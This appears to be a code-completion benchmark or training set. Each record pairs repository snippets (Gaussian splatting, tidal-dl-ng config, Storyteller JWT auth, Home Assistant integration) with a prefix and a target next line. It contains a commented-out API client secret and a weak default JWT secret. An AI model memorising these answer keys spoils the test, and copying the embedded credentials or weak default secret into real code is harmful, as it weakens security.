"snippet": "def check_finite(tensor_dict):\n for k, v in tensor_dict.items():\n n = (~torch.isfinite(v)).sum()\n if n > 0:\n raise ValueError(f'Found {n} non-finite values in {k}')\n\n if v.grad is not None:\n n = (~torch.isfinite(v.grad)).sum()\n if n > 0:\n raise ValueError(f'Found {n} non-finite gradients in {k}')"
}
] | import cv2
import argparse
import taichi as ti
import torch
import time
from torch.optim import Adam
from taichi_splatting.data_types import RasterConfig
from taichi_splatting.renderer2d import render_gaussians, Gaussians2D
from taichi_splatting.tests.random_data import random_2d_gaussians
from taichi_splatting.torch_ops.util import check_finite | 1,338 |
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('image_file', type=str)
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--tile_size', type=int, default=16)
parser.add_argument('--n', type=int, default=20000)
parser.add_argument('--debug', action='store_true')
parser.add_argument('--show', action='store_true')
parser.add_argument('--profile', action='store_true')
parser.add_argument('--epoch', type=int, default=100, help='Number of iterations per measurement/profiling')
return parser.parse_args()
def optimizer(gaussians: Gaussians2D, base_lr=1.0):
learning_rates = dict(
position=0.1,
log_scaling=0.025,
rotation=0.005,
alpha_logit=0.2,
feature=0.01
)
params = {k: torch.nn.Parameter(x, requires_grad=True)
if k in learning_rates else x
for k, x in gaussians.items()}
param_groups = [
dict(params=[params[name]], lr=lr * base_lr, name=name)
for name, lr in learning_rates.items()
]
return Adam(param_groups), Gaussians2D(**params, batch_size=gaussians.batch_size)
def display_image(image):
image = (image.detach().clamp(0, 1) * 255).to(torch.uint8)
image = image.cpu().numpy()
cv2.imshow('rendered', image)
cv2.waitKey(1)
def main():
device = torch.device('cuda:0')
args = parse_args()
ref_image = cv2.imread(args.image_file)
h, w = ref_image.shape[:2]
ti.init(arch=ti.cuda, log_level=ti.INFO,
debug=args.debug, device_memory_GB=0.1)
print(f'Image size: {w}x{h}')
if args.show:
cv2.namedWindow('rendered', cv2.WINDOW_FULLSCREEN)
torch.manual_seed(args.seed)
gaussians = random_2d_gaussians(args.n, (w, h)).to(torch.device('cuda:0'))
opt, params = optimizer(gaussians, base_lr=1.0)
ref_image = torch.from_numpy(ref_image).to(dtype=torch.float32, device=device) / 255
config = RasterConfig(tile_size=args.tile_size)
while True:
if args.profile:
ti.profiler.clear_kernel_profiler_info()
start = time.time()
for _ in range(args.epoch):
opt.zero_grad()
|
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('image_file', type=str)
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--tile_size', type=int, default=16)
parser.add_argument('--n', type=int, default=20000)
parser.add_argument('--debug', action='store_true')
parser.add_argument('--show', action='store_true')
parser.add_argument('--profile', action='store_true')
parser.add_argument('--epoch', type=int, default=100, help='Number of iterations per measurement/profiling')
return parser.parse_args()
def optimizer(gaussians: Gaussians2D, base_lr=1.0):
learning_rates = dict(
position=0.1,
log_scaling=0.025,
rotation=0.005,
alpha_logit=0.2,
feature=0.01
)
params = {k: torch.nn.Parameter(x, requires_grad=True)
if k in learning_rates else x
for k, x in gaussians.items()}
param_groups = [
dict(params=[params[name]], lr=lr * base_lr, name=name)
for name, lr in learning_rates.items()
]
return Adam(param_groups), Gaussians2D(**params, batch_size=gaussians.batch_size)
def display_image(image):
image = (image.detach().clamp(0, 1) * 255).to(torch.uint8)
image = image.cpu().numpy()
cv2.imshow('rendered', image)
cv2.waitKey(1)
def main():
device = torch.device('cuda:0')
args = parse_args()
ref_image = cv2.imread(args.image_file)
h, w = ref_image.shape[:2]
ti.init(arch=ti.cuda, log_level=ti.INFO,
debug=args.debug, device_memory_GB=0.1)
print(f'Image size: {w}x{h}')
if args.show:
cv2.namedWindow('rendered', cv2.WINDOW_FULLSCREEN)
torch.manual_seed(args.seed)
gaussians = random_2d_gaussians(args.n, (w, h)).to(torch.device('cuda:0'))
opt, params = optimizer(gaussians, base_lr=1.0)
ref_image = torch.from_numpy(ref_image).to(dtype=torch.float32, device=device) / 255
config = RasterConfig(tile_size=args.tile_size)
while True:
if args.profile:
ti.profiler.clear_kernel_profiler_info()
start = time.time()
for _ in range(args.epoch):
opt.zero_grad()
| image = render_gaussians(params, (w, h), config) | 1 | 2023-12-17 15:26:52+00:00 | 2k |
exislow/tidal-dl-ng | tidal_dl_ng/config.py | [
{
"identifier": "SingletonMeta",
"path": "tidal_dl_ng/helper/decorator.py",
"snippet": "class SingletonMeta(type):\n \"\"\"\n The Singleton class can be implemented in different ways in Python. Some\n possible methods include: base class, decorator, metaclass. We will use the\n metaclass because it is best suited for this purpose.\n \"\"\"\n\n _instances: ClassVar[dict] = {}\n\n def __call__(cls, *args, **kwargs):\n \"\"\"\n Possible changes to the value of the `__init__` argument do not affect\n the returned instance.\n \"\"\"\n if cls not in cls._instances:\n instance = super().__call__(*args, **kwargs)\n cls._instances[cls] = instance\n\n return cls._instances[cls]"
},
{
"identifier": "path_base",
"path": "tidal_dl_ng/helper/path.py",
"snippet": "def path_base() -> str:\n path_config: str = \".config\"\n path_base: str = os.path.join(path_home(), path_config, __name_display__)\n\n return path_base"
},
{
"identifier": "path_file_settings",
"path": "tidal_dl_ng/helper/path.py",
"snippet": "def path_file_settings() -> str:\n # TODO: Remove this soon. Only for migration to new dir.\n old = os.path.join(path_home(), \".tidal-dl-ng_settings.json\")\n if os.path.isfile(old):\n os.makedirs(path_base(), exist_ok=True)\n os.rename(old, os.path.join(path_base(), \"settings.json\"))\n\n return os.path.join(path_base(), \"settings.json\")"
},
{
"identifier": "path_file_token",
"path": "tidal_dl_ng/helper/path.py",
"snippet": "def path_file_token() -> str:\n # TODO: Remove this soon. Only for migration to new dir.\n old = os.path.join(path_home(), \".tidal-dl-ng_token.json\")\n if os.path.isfile(old):\n os.makedirs(path_base(), exist_ok=True)\n os.rename(old, os.path.join(path_base(), \"token.json\"))\n\n return os.path.join(path_base(), \"token.json\")"
},
{
"identifier": "Settings",
"path": "tidal_dl_ng/model/cfg.py",
"snippet": "class Settings:\n skip_existing: SkipExisting = SkipExisting.Disabled\n # TODO: Implement cover download to a separate file.\n # album_cover_save: bool = True\n lyrics_save: bool = False\n # TODO: Implement API KEY selection.\n # api_key_index: bool = 0\n # TODO: Implement album info download to separate file.\n # album_info_save: bool = False\n video_download: bool = True\n # TODO: Implement multi threading for downloads.\n # multi_thread: bool = False\n download_delay: bool = True\n download_base_path: str = \"./download\"\n quality_audio: Quality = Quality.low_320k\n quality_video: QualityVideo = QualityVideo.P480\n format_album: str = \"Albums/{artist_name} - {album_title}/{track_num}. {artist_name} - {track_title}\"\n format_playlist: str = \"Playlists/{playlist_name}/{artist_name} - {track_title}\"\n format_mix: str = \"Mix/{mix_name}/{artist_name} - {track_title}\"\n format_track: str = \"Tracks/{artist_name} - {track_title}\"\n format_video: str = \"Videos/{artist_name} - {track_title}\"\n video_convert_mp4: bool = True\n metadata_cover_dimension: CoverDimensions = CoverDimensions.Px320"
},
{
"identifier": "Token",
"path": "tidal_dl_ng/model/cfg.py",
"snippet": "class Token:\n token_type: str | None = None\n access_token: str | None = None\n refresh_token: str | None = None\n expiry_time: float = 0.0"
}
] | import os
import shutil
import tidalapi
from collections.abc import Callable
from json import JSONDecodeError
from typing import Any
from requests import HTTPError
from tidal_dl_ng.helper.decorator import SingletonMeta
from tidal_dl_ng.helper.path import path_base, path_file_settings, path_file_token
from tidal_dl_ng.model.cfg import Settings as ModelSettings
from tidal_dl_ng.model.cfg import Token as ModelToken | 1,506 |
class BaseConfig:
data: ModelSettings | ModelToken = None
file_path: str = None
cls_model: object = None
path_base: str = path_base()
def save(self) -> None:
data_json = self.data.to_json()
# Try to create the base folder.
os.makedirs(self.path_base, exist_ok=True)
with open(self.file_path, encoding="utf-8", mode="w") as f:
f.write(data_json)
def set_option(self, key: str, value: Any) -> None:
setattr(self.data, key, value)
def read(self, path: str) -> bool:
result = False
try:
with open(path, encoding="utf-8") as f:
settings_json = f.read()
self.data = self.cls_model.from_json(settings_json)
result = True
except (JSONDecodeError, TypeError, FileNotFoundError, ValueError) as e:
if isinstance(e, ValueError):
path_bak = path + ".bak"
# First check if a backup file already exists. If yes, remove it.
if os.path.exists(path_bak):
os.remove(path_bak)
# Move the invalid config file to the backup location.
shutil.move(path, path_bak)
# TODO: Implement better global logger.
print(
"Something is wrong with your config. Maybe it is not compatible anymore due to a new app version."
f" You can find a backup of your old config here: '{path_bak}'. A new default config was created."
)
self.data = self.cls_model()
# Call save in case of we need to update the saved config, due to changes in code.
# TODO: Compare if config in memory and on disk is different. Otherwise no write operation.
self.save()
return result
class Settings(BaseConfig, metaclass=SingletonMeta):
cls_model = ModelSettings
data = None
def __init__(self):
self.file_path = path_file_settings()
self.read(self.file_path)
class Tidal(BaseConfig, metaclass=SingletonMeta):
cls_model = ModelToken
session: tidalapi.Session = None
data: ModelToken = None
token_from_storage: bool = False
settings: Settings = None
def __init__(self, settings: Settings = None):
self.session = tidalapi.Session()
# self.session.config.client_id = "km8T1xS355y7dd3H"
# self.session.config.client_secret = "vcmeGW1OuZ0fWYMCSZ6vNvSLJlT3XEpW0ambgYt5ZuI="
self.session.video_quality = tidalapi.VideoQuality.high
|
class BaseConfig:
data: ModelSettings | ModelToken = None
file_path: str = None
cls_model: object = None
path_base: str = path_base()
def save(self) -> None:
data_json = self.data.to_json()
# Try to create the base folder.
os.makedirs(self.path_base, exist_ok=True)
with open(self.file_path, encoding="utf-8", mode="w") as f:
f.write(data_json)
def set_option(self, key: str, value: Any) -> None:
setattr(self.data, key, value)
def read(self, path: str) -> bool:
result = False
try:
with open(path, encoding="utf-8") as f:
settings_json = f.read()
self.data = self.cls_model.from_json(settings_json)
result = True
except (JSONDecodeError, TypeError, FileNotFoundError, ValueError) as e:
if isinstance(e, ValueError):
path_bak = path + ".bak"
# First check if a backup file already exists. If yes, remove it.
if os.path.exists(path_bak):
os.remove(path_bak)
# Move the invalid config file to the backup location.
shutil.move(path, path_bak)
# TODO: Implement better global logger.
print(
"Something is wrong with your config. Maybe it is not compatible anymore due to a new app version."
f" You can find a backup of your old config here: '{path_bak}'. A new default config was created."
)
self.data = self.cls_model()
# Call save in case of we need to update the saved config, due to changes in code.
# TODO: Compare if config in memory and on disk is different. Otherwise no write operation.
self.save()
return result
class Settings(BaseConfig, metaclass=SingletonMeta):
cls_model = ModelSettings
data = None
def __init__(self):
self.file_path = path_file_settings()
self.read(self.file_path)
class Tidal(BaseConfig, metaclass=SingletonMeta):
cls_model = ModelToken
session: tidalapi.Session = None
data: ModelToken = None
token_from_storage: bool = False
settings: Settings = None
def __init__(self, settings: Settings = None):
self.session = tidalapi.Session()
# self.session.config.client_id = "km8T1xS355y7dd3H"
# self.session.config.client_secret = "vcmeGW1OuZ0fWYMCSZ6vNvSLJlT3XEpW0ambgYt5ZuI="
self.session.video_quality = tidalapi.VideoQuality.high | self.file_path = path_file_token() | 3 | 2023-12-19 23:05:47+00:00 | 2k |
smoores-dev/storyteller | storyteller/api/auth.py | [
{
"identifier": "InviteAccept",
"path": "storyteller/api/models.py",
"snippet": "class InviteAccept(BaseModel):\n username: str\n full_name: str\n email: str\n password: str\n invite_key: str"
},
{
"identifier": "TokenData",
"path": "storyteller/api/models.py",
"snippet": "class TokenData(BaseModel):\n username: str"
},
{
"identifier": "get_user",
"path": "storyteller/api/database/users.py",
"snippet": "def get_user(username: str):\n cursor = connection.execute(\n \"\"\"\n SELECT\n username,\n full_name,\n email,\n hashed_password,\n book_create,\n book_read,\n book_process,\n book_download,\n book_list,\n user_create,\n user_list,\n user_read,\n user_delete,\n settings_update\n FROM user\n JOIN user_permission\n ON user.user_permission_id = user_permission.id\n WHERE username = :username\n \"\"\",\n {\"username\": username},\n )\n\n (\n username,\n full_name,\n email,\n hashed_password,\n book_create,\n book_read,\n book_process,\n book_download,\n book_list,\n user_create,\n user_list,\n user_read,\n user_delete,\n settings_update,\n ) = cursor.fetchone()\n\n return DBUser(\n username=username,\n full_name=full_name,\n email=email,\n permissions=UserPermissions(\n book_create=book_create,\n book_read=book_read,\n book_process=book_process,\n book_download=book_download,\n book_list=book_list,\n user_create=user_create,\n user_list=user_list,\n user_read=user_read,\n user_delete=user_delete,\n settings_update=settings_update,\n ),\n hashed_password=hashed_password,\n )"
},
{
"identifier": "user_has_permission",
"path": "storyteller/api/database/users.py",
"snippet": "def user_has_permission(username: str, permission: str):\n cursor = connection.execute(\n f\"\"\"\n SELECT {permission}\n FROM user_permission\n JOIN user\n ON user.user_permission_id = user_permission.id\n WHERE user.username = :username\n \"\"\",\n {\"username\": username, \"permission\": permission},\n )\n\n (has_permission,) = cursor.fetchone()\n\n return has_permission"
},
{
"identifier": "verify_invite",
"path": "storyteller/api/database/invites.py",
"snippet": "def verify_invite(email: str, key: str):\n cursor = connection.execute(\n \"\"\"\n SELECT id\n FROM invite\n WHERE email=:email\n AND key=:key\n \"\"\",\n {\"email\": email, \"key\": key},\n )\n\n return cursor.fetchone() is None"
}
] | import base64
import json
import os
from datetime import timedelta, datetime
from typing import Annotated, Optional, cast
from urllib.parse import unquote
from jose import JWTError, jwt
from fastapi import Body, Depends, HTTPException, Request, status
from fastapi.security import OAuth2PasswordBearer
from passlib.context import CryptContext
from starlette.status import HTTP_401_UNAUTHORIZED
from .models import InviteAccept, TokenData
from .database import get_user, user_has_permission, verify_invite as verify_invite_db | 1,332 |
SECRET_KEY = os.getenv("STORYTELLER_SECRET_KEY", "<notsosecret>")
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_DAYS = 10
class OAuth2PasswordBearerWithCookie(OAuth2PasswordBearer):
async def __call__(self, request: Request) -> Optional[str]:
header_param = None
try:
header_param = await super().__call__(request)
except HTTPException:
pass
if header_param is not None:
return header_param
auth_cookie = request.cookies.get("st_token")
if not auth_cookie:
if self.auto_error:
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail="Not authenticated",
headers={"WWW-Authenticate": "Bearer"},
)
else:
return None
auth_token = json.loads(base64.urlsafe_b64decode(unquote(auth_cookie)))
access_token = auth_token["access_token"]
if not access_token:
if self.auto_error:
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail="Not authenticated",
headers={"WWW-Authenticate": "Bearer"},
)
else:
return None
return access_token
oauth2_scheme = OAuth2PasswordBearerWithCookie(tokenUrl="token")
password_context = CryptContext(schemes=["argon2"], deprecated="auto")
def verify_password(plain_password: str, hashed_password: str):
return password_context.verify(plain_password, hashed_password)
def get_password_hash(password: str):
return password_context.hash(password)
def authenticate_user(username: str, password: str):
try:
user = get_user(username)
except:
return None
if not verify_password(password, user.hashed_password):
return None
return user
def create_access_token(data: dict, expires_delta: timedelta | None = None):
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(days=ACCESS_TOKEN_EXPIRE_DAYS)
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
unauthorized = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication credentials",
headers={"WWW-Authenticate": "Bearer"},
)
def verify_token(token: Annotated[str, Depends(oauth2_scheme)]):
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
username: str | None = cast(str | None, payload.get("sub"))
if username is None:
raise unauthorized
token_data = TokenData(username=username)
except JWTError:
raise unauthorized
return token_data
def verify_invite(invite: Annotated[InviteAccept, Body()]):
|
SECRET_KEY = os.getenv("STORYTELLER_SECRET_KEY", "<notsosecret>")
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_DAYS = 10
class OAuth2PasswordBearerWithCookie(OAuth2PasswordBearer):
async def __call__(self, request: Request) -> Optional[str]:
header_param = None
try:
header_param = await super().__call__(request)
except HTTPException:
pass
if header_param is not None:
return header_param
auth_cookie = request.cookies.get("st_token")
if not auth_cookie:
if self.auto_error:
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail="Not authenticated",
headers={"WWW-Authenticate": "Bearer"},
)
else:
return None
auth_token = json.loads(base64.urlsafe_b64decode(unquote(auth_cookie)))
access_token = auth_token["access_token"]
if not access_token:
if self.auto_error:
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail="Not authenticated",
headers={"WWW-Authenticate": "Bearer"},
)
else:
return None
return access_token
oauth2_scheme = OAuth2PasswordBearerWithCookie(tokenUrl="token")
password_context = CryptContext(schemes=["argon2"], deprecated="auto")
def verify_password(plain_password: str, hashed_password: str):
return password_context.verify(plain_password, hashed_password)
def get_password_hash(password: str):
return password_context.hash(password)
def authenticate_user(username: str, password: str):
try:
user = get_user(username)
except:
return None
if not verify_password(password, user.hashed_password):
return None
return user
def create_access_token(data: dict, expires_delta: timedelta | None = None):
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(days=ACCESS_TOKEN_EXPIRE_DAYS)
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
unauthorized = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication credentials",
headers={"WWW-Authenticate": "Bearer"},
)
def verify_token(token: Annotated[str, Depends(oauth2_scheme)]):
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
username: str | None = cast(str | None, payload.get("sub"))
if username is None:
raise unauthorized
token_data = TokenData(username=username)
except JWTError:
raise unauthorized
return token_data
def verify_invite(invite: Annotated[InviteAccept, Body()]): | if verify_invite_db(invite.email, invite.invite_key): | 1 | 2023-12-15 16:07:12+00:00 | 2k |
noprobelm/terminal-cellular-automaton | tests/test_cell.py | [
{
"identifier": "MooreCell",
"path": "terminal_cellular_automaton/cell.py",
"snippet": "class MooreCell:\n \"\"\"A cell that references members of a MooreNeighborhood\n\n +---+---+---+\n | 1 | 2 | 3 |\n +---+---+---+\n | 4 | C | 5 |\n +---+---+---+\n | 6 | 7 | 8 |\n +---+---+---+\n\n \"\"\"\n\n neighbors: Tuple[Coordinate, ...] = (\n # Upper left\n Coordinate(-1, -1),\n # Upper\n Coordinate(0, -1),\n # Upper right\n Coordinate(1, -1),\n # Right\n Coordinate(1, 0),\n # Lower right\n Coordinate(1, 1),\n # Lower\n Coordinate(0, 1),\n # Lower left\n Coordinate(-1, 1),\n # Left\n Coordinate(-1, 0),\n )\n\n def __init__(self, coord: Coordinate) -> None:\n \"\"\"Initializes an instance of the MooreCell class\"\"\"\n self.coord = coord\n\n def get_neighbors(self, max_coord: Coordinate) -> list[Coordinate]:\n \"\"\"Gets neighbors based on the max coord.\n\n Neighbors will usually be the eight surrounding cells in an automaton, but for cells living along the min/max\n coords, neighbors will wrap around to the other side of this grid. This ensures continuity and enables\n a life to wrap around the other side of the simulation once it reaches a boundary, emulating a pseudo-infinite\n space.\n\n Args:\n max_coord (Coordinate): The maximum coordinate found in the underlying Automaton\n\n Returns:\n A list of the cell's neighbors\n \"\"\"\n neighbors = []\n for nc in self.neighbors:\n n = nc + self.coord\n if n.x < 0 and n.y < 0:\n n = Coordinate(max_coord.x, max_coord.y)\n elif n.x > max_coord.x and n.y > max_coord.y:\n n = Coordinate(0, 0)\n elif n.x < 0 and n.y > max_coord.y:\n n = Coordinate(max_coord.x, 0)\n elif n.y < 0 and n.x > max_coord.x:\n n = Coordinate(0, max_coord.y)\n elif n.x > max_coord.x:\n n = Coordinate(0, n.y)\n elif n.y < 0:\n n = Coordinate(n.x, max_coord.y)\n elif n.y > max_coord.y:\n n = Coordinate(n.x, 0)\n elif n.x < 0:\n n = Coordinate(max_coord.x, n.y)\n elif n.x > max_coord.x:\n n = Coordinate(0, n.y)\n\n neighbors.append(n)\n\n return neighbors"
},
{
"identifier": "Coordinate",
"path": "terminal_cellular_automaton/coordinate.py",
"snippet": "class Coordinate:\n \"\"\"An x/y coordinate to reference location in a 2 dimensional matrix\"\"\"\n\n x: int\n y: int\n\n def __add__(self, other: Coordinate) -> Coordinate:\n \"\"\"Returns the sum of one coordinate and another. Primarily used to identify neighbors\"\"\"\n return Coordinate(self.x + other.x, self.y + other.y)\n\n def __sub__(self, other: Coordinate) -> Coordinate:\n \"\"\"Returns the sum of one coordinate and another. Primarily used to identify neighbors\"\"\"\n return Coordinate(self.x - other.x, self.y - other.y)\n\n def __contains__(self, other: Coordinate) -> bool:\n if 0 <= other.x <= self.x and 0 <= other.y <= self.y:\n return True\n return False"
}
] | from ward import test, fixture
from terminal_cellular_automaton.cell import MooreCell
from terminal_cellular_automaton.coordinate import Coordinate | 970 | """Tests the get_neighbors method for all Cell types"""
@fixture
def max_coord():
return Coordinate(2, 2)
@test("A centrally located MooreCell will have 8 neighbors in its immediate area")
def _():
| """Tests the get_neighbors method for all Cell types"""
@fixture
def max_coord():
return Coordinate(2, 2)
@test("A centrally located MooreCell will have 8 neighbors in its immediate area")
def _(): | c = MooreCell(Coordinate(1, 1)) | 0 | 2023-12-20 21:47:46+00:00 | 2k |
zyrant/SPGroup3D | mmdet3d/models/dense_heads/fcaf3d_head.py | [
{
"identifier": "rotation_3d_in_axis",
"path": "mmdet3d/core/bbox/structures/utils.py",
"snippet": "@array_converter(apply_to=('points', 'angles'))\ndef rotation_3d_in_axis(points,\n angles,\n axis=0,\n return_mat=False,\n clockwise=False):\n \"\"\"Rotate points by angles according to axis.\n\n Args:\n points (np.ndarray | torch.Tensor | list | tuple ):\n Points of shape (N, M, 3).\n angles (np.ndarray | torch.Tensor | list | tuple | float):\n Vector of angles in shape (N,)\n axis (int, optional): The axis to be rotated. Defaults to 0.\n return_mat: Whether or not return the rotation matrix (transposed).\n Defaults to False.\n clockwise: Whether the rotation is clockwise. Defaults to False.\n\n Raises:\n ValueError: when the axis is not in range [0, 1, 2], it will\n raise value error.\n\n Returns:\n (torch.Tensor | np.ndarray): Rotated points in shape (N, M, 3).\n \"\"\"\n batch_free = len(points.shape) == 2\n if batch_free:\n points = points[None]\n\n if isinstance(angles, float) or len(angles.shape) == 0:\n angles = torch.full(points.shape[:1], angles)\n\n assert len(points.shape) == 3 and len(angles.shape) == 1 \\\n and points.shape[0] == angles.shape[0], f'Incorrect shape of points ' \\\n f'angles: {points.shape}, {angles.shape}'\n\n assert points.shape[-1] in [2, 3], \\\n f'Points size should be 2 or 3 instead of {points.shape[-1]}'\n\n rot_sin = torch.sin(angles)\n rot_cos = torch.cos(angles)\n ones = torch.ones_like(rot_cos)\n zeros = torch.zeros_like(rot_cos)\n\n if points.shape[-1] == 3:\n if axis == 1 or axis == -2:\n rot_mat_T = torch.stack([\n torch.stack([rot_cos, zeros, -rot_sin]),\n torch.stack([zeros, ones, zeros]),\n torch.stack([rot_sin, zeros, rot_cos])\n ])\n elif axis == 2 or axis == -1:\n rot_mat_T = torch.stack([\n torch.stack([rot_cos, rot_sin, zeros]),\n torch.stack([-rot_sin, rot_cos, zeros]),\n torch.stack([zeros, zeros, ones])\n ])\n elif axis == 0 or axis == -3:\n rot_mat_T = torch.stack([\n torch.stack([ones, zeros, zeros]),\n torch.stack([zeros, rot_cos, rot_sin]),\n torch.stack([zeros, -rot_sin, rot_cos])\n ])\n else:\n raise ValueError(f'axis should in range '\n f'[-3, -2, -1, 0, 1, 2], got {axis}')\n else:\n rot_mat_T = torch.stack([\n torch.stack([rot_cos, rot_sin]),\n torch.stack([-rot_sin, rot_cos])\n ])\n\n if clockwise:\n rot_mat_T = rot_mat_T.transpose(0, 1)\n\n if points.shape[0] == 0:\n points_new = points\n else:\n points_new = torch.einsum('aij,jka->aik', points, rot_mat_T)\n\n if batch_free:\n points_new = points_new.squeeze(0)\n\n if return_mat:\n rot_mat_T = torch.einsum('jka->ajk', rot_mat_T)\n if batch_free:\n rot_mat_T = rot_mat_T.squeeze(0)\n return points_new, rot_mat_T\n else:\n return points_new"
},
{
"identifier": "HEADS",
"path": "mmdet3d/models/builder.py",
"snippet": "HEADS = MODELS"
},
{
"identifier": "build_loss",
"path": "mmdet3d/models/builder.py",
"snippet": "def build_loss(cfg):\n \"\"\"Build loss function.\"\"\"\n if cfg['type'] in LOSSES._module_dict.keys():\n return LOSSES.build(cfg)\n elif cfg['type'] in MMDET_LOSSES._module_dict.keys():\n return MMDET_LOSSES.build(cfg)\n else:\n return MMSEG_LOSSES.build(cfg)"
}
] | import MinkowskiEngine as ME
import warnings
import torch
from mmcv.cnn import Scale, bias_init_with_prob
from mmcv.ops import nms3d, nms3d_normal
from mmcv.runner.base_module import BaseModule
from torch import nn
from mmdet3d.core.bbox.structures import rotation_3d_in_axis
from mmdet3d.models import HEADS, build_loss
from mmdet.core import reduce_mean | 1,205 | # Copyright (c) OpenMMLab. All rights reserved.
# Adapted from https://github.com/SamsungLabs/fcaf3d/blob/master/mmdet3d/models/dense_heads/fcaf3d_neck_with_head.py # noqa
try:
except ImportError:
warnings.warn(
'Please follow `getting_started.md` to install MinkowskiEngine.`')
| # Copyright (c) OpenMMLab. All rights reserved.
# Adapted from https://github.com/SamsungLabs/fcaf3d/blob/master/mmdet3d/models/dense_heads/fcaf3d_neck_with_head.py # noqa
try:
except ImportError:
warnings.warn(
'Please follow `getting_started.md` to install MinkowskiEngine.`')
| @HEADS.register_module() | 1 | 2023-12-21 12:50:35+00:00 | 2k |
jdejaegh/irm-kmi-ha | custom_components/irm_kmi/config_flow.py | [
{
"identifier": "IrmKmiApiClient",
"path": "custom_components/irm_kmi/api.py",
"snippet": "class IrmKmiApiClient:\n \"\"\"API client for IRM KMI weather data\"\"\"\n COORD_DECIMALS = 6\n\n def __init__(self, session: aiohttp.ClientSession) -> None:\n self._session = session\n self._base_url = \"https://app.meteo.be/services/appv4/\"\n\n async def get_forecasts_coord(self, coord: dict) -> dict:\n \"\"\"Get forecasts for given city.\"\"\"\n assert 'lat' in coord\n assert 'long' in coord\n coord['lat'] = round(coord['lat'], self.COORD_DECIMALS)\n coord['long'] = round(coord['long'], self.COORD_DECIMALS)\n\n response = await self._api_wrapper(params={\"s\": \"getForecasts\", \"k\": _api_key(\"getForecasts\")} | coord)\n return await response.json()\n\n async def get_image(self, url, params: dict | None = None) -> bytes:\n \"\"\"Get the image at the specified url with the parameters\"\"\"\n r: ClientResponse = await self._api_wrapper(base_url=url, params={} if params is None else params)\n return await r.read()\n\n async def _api_wrapper(\n self,\n params: dict,\n base_url: str | None = None,\n path: str = \"\",\n method: str = \"get\",\n data: dict | None = None,\n headers: dict | None = None,\n ) -> any:\n \"\"\"Get information from the API.\"\"\"\n\n try:\n async with async_timeout.timeout(10):\n response = await self._session.request(\n method=method,\n url=f\"{self._base_url if base_url is None else base_url}{path}\",\n headers=headers,\n json=data,\n params=params\n )\n response.raise_for_status()\n return response\n\n except asyncio.TimeoutError as exception:\n raise IrmKmiApiCommunicationError(\"Timeout error fetching information\") from exception\n except (aiohttp.ClientError, socket.gaierror) as exception:\n raise IrmKmiApiCommunicationError(\"Error fetching information\") from exception\n except Exception as exception: # pylint: disable=broad-except\n raise IrmKmiApiError(f\"Something really wrong happened! {exception}\") from exception"
},
{
"identifier": "CONF_DARK_MODE",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONF_DARK_MODE: Final = \"dark_mode\""
},
{
"identifier": "CONF_STYLE",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONF_STYLE: Final = \"style\""
},
{
"identifier": "CONF_STYLE_OPTIONS",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONF_STYLE_OPTIONS: Final = [\n OPTION_STYLE_STD,\n OPTION_STYLE_CONTRAST,\n OPTION_STYLE_YELLOW_RED,\n OPTION_STYLE_SATELLITE\n]"
},
{
"identifier": "CONF_USE_DEPRECATED_FORECAST",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONF_USE_DEPRECATED_FORECAST: Final = 'use_deprecated_forecast_attribute'"
},
{
"identifier": "CONF_USE_DEPRECATED_FORECAST_OPTIONS",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONF_USE_DEPRECATED_FORECAST_OPTIONS: Final = [\n OPTION_DEPRECATED_FORECAST_NOT_USED,\n OPTION_DEPRECATED_FORECAST_DAILY,\n OPTION_DEPRECATED_FORECAST_HOURLY\n]"
},
{
"identifier": "CONFIG_FLOW_VERSION",
"path": "custom_components/irm_kmi/const.py",
"snippet": "CONFIG_FLOW_VERSION = 3"
},
{
"identifier": "DOMAIN",
"path": "custom_components/irm_kmi/const.py",
"snippet": "DOMAIN: Final = 'irm_kmi'"
},
{
"identifier": "OPTION_DEPRECATED_FORECAST_NOT_USED",
"path": "custom_components/irm_kmi/const.py",
"snippet": "OPTION_DEPRECATED_FORECAST_NOT_USED: Final = 'do_not_use_deprecated_forecast'"
},
{
"identifier": "OPTION_STYLE_STD",
"path": "custom_components/irm_kmi/const.py",
"snippet": "OPTION_STYLE_STD: Final = 'standard_style'"
},
{
"identifier": "OUT_OF_BENELUX",
"path": "custom_components/irm_kmi/const.py",
"snippet": "OUT_OF_BENELUX: Final = [\"außerhalb der Benelux (Brussels)\",\n \"Hors de Belgique (Bxl)\",\n \"Outside the Benelux (Brussels)\",\n \"Buiten de Benelux (Brussel)\"]"
},
{
"identifier": "get_config_value",
"path": "custom_components/irm_kmi/utils.py",
"snippet": "def get_config_value(config_entry: ConfigEntry, key: str) -> Any:\n if config_entry.options and key in config_entry.options:\n return config_entry.options[key]\n return config_entry.data[key]"
}
] | import logging
import async_timeout
import voluptuous as vol
from homeassistant.components.zone import DOMAIN as ZONE_DOMAIN
from homeassistant.config_entries import ConfigEntry, ConfigFlow, OptionsFlow
from homeassistant.const import ATTR_LATITUDE, ATTR_LONGITUDE, CONF_ZONE
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
